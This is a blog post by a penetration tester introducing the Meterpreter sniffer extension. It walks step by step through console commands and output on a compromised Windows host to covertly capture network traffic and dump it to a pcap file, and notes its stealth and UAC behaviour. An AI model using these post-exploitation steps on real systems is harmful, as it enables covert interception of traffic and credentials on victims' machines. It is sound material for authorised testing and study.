Content

Meterpreter Sniffer Module

HD released today a early sniffer beta module. This module uses the MicroOLAP Packet Sniffer SDK which is a commercial product, it can sniff packets from the target system without writing to the file system or installing any drivers. This adds to the stealthiest of the Meterpreter modules. The module automatically excludes its own control traffic from the packet capture. I have tested this module in the following Windows Versions and Privileges:

  • Windows XP SP3 32 Bit – Administrator
  • Windows 2003 SP2 32 bit  – Administrator
  • Windows 2008 SP2 32 bit  – Administrator
  • Vista SP2 32 bit with UAC  – Administrator
  • Vista SP2 32 bit no UAC  – Administrator
  • Windows 7 32 bit with UAC  – Administrator
  • Windows 7 32 bit no UAC  – Administrator
  • Vista SP2 32 bit with UAC  – System
  • Windows 7 32 bit with UAC  – System

It worked on most the configurations without any problems, except for Windows Vista and Windows 7 with UAC enabled and running as Local Administrator, when ran as system the UAC protection was not able to mitigate the attack.

To start using this module one must only load the module while in a Meterpreter shell on a compromised target. This is achieved in the following manner:

meterpreter > use sniffer
Loading extension sniffer...success.

meterpreter >

Once the module is loaded one can proceed see the commands added to the console, to see the new commands one must only run the help command:

meterpreter > help
.......
Sniffer Commands
================

    Command             Description
    -------             -----------
    sniffer_dump        Retrieve captured packet data
    sniffer_interfaces  List all remote sniffable interfaces
    sniffer_start       Capture packets on a previously opened interface
    sniffer_stats       View statistics of an active capture
    sniffer_stop        Stop packet captures on the specified interface

As it can be seen the command allow one to:

  • List the interfaces in the target host
  • Start the packet capture
  • Get a status of the number of packet captured and the size of the captured data
  • Stop the capture
  • Dump the captured data to a pcap file

Lets start by knowing to key pieces of information if not know which are what OS and under what account I’m running under:

meterpreter > sysinfo
Computer: AWINXP01
OS      : Windows XP (Build 2600, Service Pack 2).
meterpreter > getuid
Server username: ACMEPRODINCAdministrator
meterpreter >

As we can see, the target machine is a Windows XP SP2 box and we are running under Domain Admin privileges in this box. We list the interfaces available on this box:

meterpreter > sniffer_interfaces

1 - 'VMware Accelerated AMD PCNet Adapter' ( type:0 mtu:1514 usable:true dhcp:true wifi:false )

meterpreter >

This command will give use lots of information like the MTU for the packets, if the interface usable for sniffing or not, if it is using DHCP to get its address and if it is a wireless interface. Know that we have the interfaces identified we can start sniffing on one of them:

meterpreter > sniffer_start 1 300000
[*] Capture started on interface 1 (300000 packet buffer)
meterpreter >

When starting the capture one must provide the interface number and the packet buffer to capture, if none is given a packet buffer of 200,000 packets will be used. We can check on the size of the packet capture and number of packets by running the sniffer_stats command and the number of the interface:

meterpreter > sniffer_stats 1
[*] Capture statistics for interface 1
        bytes: 17675
        packets: 196
meterpreter >

To clear the cache and save the capture to a file we run the sniffer_dump command and the file where we want to save the data to:

meterpreter > sniffer_dump 1 /tmp/capture.cap
[*] Dumping packets from interface 1...
[*] Wrote 536 packets to PCAP file /tmp/capture.cap
meterpreter >

Packets are saved in PCAP format and the buffer on the target machine is cleared. We can dump the next buffer and append it to the existing PCAP file if we want:

meterpreter > sniffer_dump 1 /tmp/capture.cap
[*] Dumping packets from interface 1...
[*] Wrote 536 packets to PCAP file /tmp/capture.cap
meterpreter > sniffer_dump 1 /tmp/capture.cap
[*] Dumping packets from interface 1...
[*] Wrote 216 packets to PCAP file /tmp/capture.cap
meterpreter >

To stop the packet capture we issue the sniffer_stop followed by the interface number to stop the capture:

meterpreter > sniffer_stop 1
[*] Capture stopped on interface 1
meterpreter >

We can later examine our captured packets with any tool that can read PCAP files like Wireshark or Network Miner. I hope you find this module as useful as I know the Security Weekly crew will in our pentests.

Carlos Perez

Carlos is currently the Principal Consultant, Team Lead for Research at TrustedSec and well-known for his research on both Metasploit and Windows Powershell. His blog www.darkoperator.com carries the tag line: “Shell Is Only The Beginning”.

Get daily email updates

SC Media's daily must-read of the most current and pressing daily news

By clicking the Subscribe button below, you agree to SC Media Terms and Conditions and Privacy Policy.